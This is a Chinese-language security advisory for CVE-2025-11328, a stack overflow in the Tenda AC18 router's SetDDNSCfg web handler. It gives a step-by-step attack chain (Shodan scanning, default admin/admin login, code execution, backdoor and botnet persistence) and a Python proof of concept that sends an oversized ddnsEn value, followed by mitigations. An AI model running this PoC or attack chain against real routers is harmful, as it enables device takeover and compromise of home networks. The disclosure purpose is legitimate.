CVE-2025-11328：Tenda AC18路由器SetDDNSCfg栈缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2025-11328

漏洞类型

栈缓冲区溢出（Stack-based Buffer Overflow）

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda AC18 路由器

漏洞概述

CVE-2025-11328是Tenda AC18路由器固件版本15.03.05.19(6318)中存在的一个高危安全漏洞。该漏洞位于路由器的Web管理接口/goform/SetDDNSCfg处理模块中，属于典型的栈缓冲区溢出漏洞。攻击者可通过向该接口发送精心构造的HTTP请求，操纵ddnsEn参数的值，从而触发栈缓冲区溢出，导致远程代码执行。

该漏洞的CVSS 3.1评分为8.8分，属于高危级别。攻击者无需物理接触设备，仅需通过网络即可发起攻击，且不需要高权限用户认证，仅需低权限即可触发。漏洞的成功利用将导致路由器设备的机密性、完整性和可用性全部受到严重影响，攻击者可以获取设备控制权、执行任意代码、窃取敏感信息或使设备完全不可用。

该漏洞的PoC（概念验证代码）已经公开披露，这意味着该漏洞正面临被大规模利用的风险。Tenda AC18作为一款广泛应用于家庭和小型办公环境的无线路由器，一旦被攻击者利用，可能导致用户网络被入侵、个人数据泄露、设备被劫持成为僵尸网络节点等严重后果。由于IoT设备固件更新困难，许多受影响设备可能长期处于未修复状态，安全风险持续存在。

技术细节

该漏洞的根本原因在于Tenda AC18路由器固件中/goform/SetDDNSCfg接口对ddnsEn参数的处理缺乏充分的长度验证。SetDDNSCfg是路由器用于配置动态DNS（DDNS）服务的功能接口，ddnsEn参数用于控制DDNS功能的启用状态。

在正常情况下，ddnsEn参数应接受一个布尔值（0或1），但固件中的处理函数在接收该参数时未对输入数据进行边界检查，直接将用户输入复制到固定大小的栈缓冲区中。当攻击者传入超长字符串作为ddnsEn参数的值时，数据将超出栈缓冲区的容量，导致栈缓冲区溢出。

利用方式如下：
1. 攻击者首先通过HTTP POST请求访问/goform/SetDDNSCfg接口；
2. 在请求中构造超长字符串作为ddnsEn参数的值；
3. 服务器端处理该请求时，超长数据溢出栈缓冲区，覆盖返回地址和其他关键栈帧数据；
4. 攻击者可通过精心构造溢出数据来控制程序执行流，实现任意代码执行；
5. 由于该接口仅需低权限认证，攻击者可在获取基本访问权限后轻松利用此漏洞。

由于漏洞位于网络服务中且无需用户交互，攻击者可远程批量扫描并利用暴露在公网上的Tenda AC18设备，潜在威胁巨大。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过Shodan、ZoomEye等网络空间搜索引擎扫描暴露在公网上的Tenda AC18路由器设备，识别潜在目标。

STEP 2

步骤2：获取访问权限

由于漏洞仅需低权限认证，攻击者通过默认凭证（admin/admin）或暴力破解等方式获取路由器的Web管理界面访问权限。

STEP 3

步骤3：构造恶意请求

攻击者构造包含超长ddnsEn参数的HTTP POST请求，目标是/goform/SetDDNSCfg接口。

STEP 4

步骤4：触发缓冲区溢出

发送恶意请求后，服务器端处理ddnsEn参数时发生栈缓冲区溢出，覆盖返回地址，控制程序执行流。

STEP 5

步骤5：执行任意代码

攻击者利用ROP链或shellcode执行任意代码，获取路由器完全控制权。

STEP 6

步骤6：持久化与扩散

攻击者在路由器中植入后门，可能将设备纳入僵尸网络，窃取用户网络流量或进一步攻击内网其他设备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11328 PoC - Tenda AC18 SetDDNSCfg Stack Buffer Overflow
# Exploit for stack-based buffer overflow via ddnsEn parameter

import requests

TARGET_URL = "http://TARGET_IP"
ENDPOINT = "/goform/SetDDNSCfg"

def exploit(target_ip):
    """
    Send a crafted POST request with an oversized ddnsEn parameter
    to trigger stack-based buffer overflow in SetDDNSCfg handler.
    """
    url = f"http://{target_ip}{ENDPOINT}"
    
    # Construct overflow payload - long string to overflow stack buffer
    payload = "A" * 1024  # Adjust length to overflow the stack buffer
    
    # POST data with malicious ddnsEn parameter
    data = {
        "ddnsEn": payload,
        "ddnsUser": "test",
        "ddnsPwd": "test"
    }
    
    try:
        response = requests.post(url, data=data, timeout=10)
        print(f"[*] Request sent to {url}")
        print(f"[*] Status code: {response.status_code}")
        print(f"[*] Response length: {len(response.text)}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

if __name__ == "__main__":
    target = "192.168.0.1"  # Default Tenda router IP
    exploit(target)

影响范围

Tenda AC18 15.03.05.19(6318)

防御指南

临时缓解措施

在等待厂商发布安全补丁期间，建议采取以下临时缓解措施：1）立即修改路由器默认登录密码，使用强密码；2）禁用路由器的远程管理功能，仅允许局域网内访问；3）在防火墙中限制对路由器Web管理端口（通常为80/443）的外部访问；4）如非必要，将路由器管理界面置于独立VLAN中隔离；5）监控路由器日志，检测异常的/goform/SetDDNSCfg访问请求；6）考虑使用WAF（Web应用防火墙）规则过滤超长ddnsEn参数的请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11328
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11328
3 Details https://www.cvedetails.com/cve/CVE-2025-11328/
4 VulDB https://vuldb.com/cve/CVE-2025-11328
5 Link https://github.com/noahze01/IoT-vulnerable/blob/main/Tenda/AC18/SetDDNSCfg.md
6 Link https://vuldb.com/?ctiid.327211
7 Link https://vuldb.com/?id.327211
8 Link https://vuldb.com/?submit.664533
9 Link https://www.tenda.com.cn/